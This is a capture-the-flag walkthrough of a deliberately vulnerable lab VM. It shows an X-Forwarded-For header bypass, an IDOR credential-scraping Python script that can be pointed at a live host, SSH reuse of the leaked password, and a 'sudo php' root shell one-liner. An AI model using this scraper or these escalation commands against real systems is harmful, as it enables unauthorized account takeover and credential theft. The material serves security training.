一、Me-and-My-Girlfriend-1:
2、Target:
Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where
the couple was originally very romantic, but since Alice worked at a private company,
"Ceban Corp", something has changed from Alice's attitude towards Bob like something is
"hidden", And Bob asks for your help to get what Alice is hiding and get full access to the
company!
Difficulty Level: Beginner
Notes: there are 2 flag files // goal: collect both flags and obtain root
Learning: Web Application | Simple Privilege Escalation
2、Environment:
(1) Kali Linux -> attacker machine
(2) Target VM -> https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova
3、Walkthrough:
(1) ifconfig (or ip a) -> check the Kali attacker's IP -> 192.168.80.129
(2) Because Kali and the target are on the same network, use nmap to find live hosts (e.g. a ping sweep with nmap -sn on the /24, then a port scan of the host that answers); 192.168.80.128 has port 80 open:
(3) Browsing to port 80 on 192.168.80.128, the request is blocked:
Open the browser developer tools (F12) and look at the front-end source; it carries a hint that the check can be bypassed with the X-Forwarded-For (XFF) header, i.e. the application trusts a client-supplied header as the client address:
(4) After adding X-Forwarded-For: 127.0.0.1 to the request the block is bypassed and new-user registration becomes available; register an account and log in:
(5) Once logged in, the user_id parameter on the profile page has a horizontal privilege escalation (IDOR) flaw: there is no check that the requested id belongs to the logged-in user, so iterating user_id returns any user's profile. At user_id = 5 Alice's profile appears, showing her account name and a masked password; the masking is done only in the front end (the password input still carries the real value in the HTML), so her credentials leak:
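The IDOR walk described in steps (3) to (5), as an added worked example rather than code from the original writeup or the VM author. It sends the X-Forwarded-For bypass on every request, iterates user_id, and pulls the username and the "masked" password straight out of the returned HTML. The profile URL pattern (index.php?page=profile&user_id=N), the PHPSESSID cookie name and the input field names (username, password) are assumptions, since the writeup does not spell them out; the sample HTML is constructed to run the parser offline and is not captured from the box.

```python
"""Walk the profile IDOR behind the X-Forwarded-For check and pull the
credentials the page only masks client-side.

Added example for this writeup, not code from the original page or the
VM author. Assumptions (not stated in the writeup): the profile URL pattern
index.php?page=profile&user_id=N, a PHPSESSID session cookie, and that the
profile form uses <input name="username"> / <input name="password">.
"""
import urllib.error
import urllib.request
from html.parser import HTMLParser
from typing import Dict, Optional, Tuple

# Constructed sample of a profile page whose password is "masked" only by
# type="password"; the real value is still in the HTML. Not captured from
# the box, just built here to exercise the parser offline.
SAMPLE_PROFILE_HTML = """
<html><body>
<form action="index.php?page=profile" method="post">
  <label>Username</label>
  <input type="text" name="username" value="alice">
  <label>Password</label>
  <input type="password" name="password" value="sample-secret">
</form>
</body></html>
"""


class _InputCollector(HTMLParser):
    """Collect name -> value for every <input> element in the page."""

    def __init__(self) -> None:
        super().__init__()
        self.fields: Dict[str, str] = {}

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() != "input":
            return
        a = dict(attrs)
        name = a.get("name")
        if name:
            # value is None for a bare attribute; normalise to ""
            self.fields[name] = a.get("value") or ""


def extract_credentials(html: str) -> Optional[Tuple[str, str]]:
    """Return (username, password) if both inputs carry a value, else None.

    A type="password" input with a non-empty value means the server sent
    the secret to the client and only the UI hides it.
    """
    p = _InputCollector()
    p.feed(html)
    user = p.fields.get("username")
    pw = p.fields.get("password")
    return (user, pw) if user and pw else None


def build_request(base: str, user_id: int, session: str) -> urllib.request.Request:
    """Build the profile request with the XFF bypass and our session cookie."""
    req = urllib.request.Request(f"{base}/index.php?page=profile&user_id={user_id}")
    # The app trusts this client-supplied header as the real client address.
    req.add_header("X-Forwarded-For", "127.0.0.1")
    req.add_header("Cookie", f"PHPSESSID={session}")
    return req


def enumerate_profiles(base: str, session: str, ids=range(1, 11)) -> Dict[int, Tuple[str, str]]:
    """Iterate user_id values and return every profile that leaks credentials."""
    found: Dict[int, Tuple[str, str]] = {}
    for uid in ids:
        try:
            with urllib.request.urlopen(build_request(base, uid, session), timeout=5) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except (urllib.error.URLError, OSError):
            continue
        creds = extract_credentials(body)
        if creds:
            found[uid] = creds
    return found


if __name__ == "__main__":
    import sys
    # Offline demo on the constructed sample; pass a base URL and the session
    # cookie obtained after registering to walk a live target, e.g.
    #   python3 idor_enum.py http://192.168.80.128 <PHPSESSID>
    if len(sys.argv) == 3:
        for uid, (u, pw) in sorted(enumerate_profiles(sys.argv[1], sys.argv[2]).items()):
            print(f"user_id={uid}: {u}:{pw}")
    else:
        print(extract_credentials(SAMPLE_PROFILE_HTML))
```

The same loop doubles as the fix check after remediation: once the server binds the profile lookup to the session's own user (and stops echoing the password back at all), extract_credentials() should return None for every id other than your own.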
(6) Use the leaked credentials to log in to alice's account over SSH, which gives a shell on the box (the "RCE" of this chain is simply password reuse between the web app and SSH):
The first flag is in flag1.txt inside the .my_secret directory:
(7) whoami shows the current user is alice, not root, so manual privilege escalation is needed.
Run sudo -l to list the commands the current user may execute through sudo; the output shows the user's sudo rights, including whether a password is required and any restrictions. From the output we can conclude that the current user may run the php binary as root without supplying a password, so any PHP one-liner that spawns a shell runs as root:
sudo php -r "system('/bin/bash');"
This command escalates to root:
Enter the /root directory and grab flag2: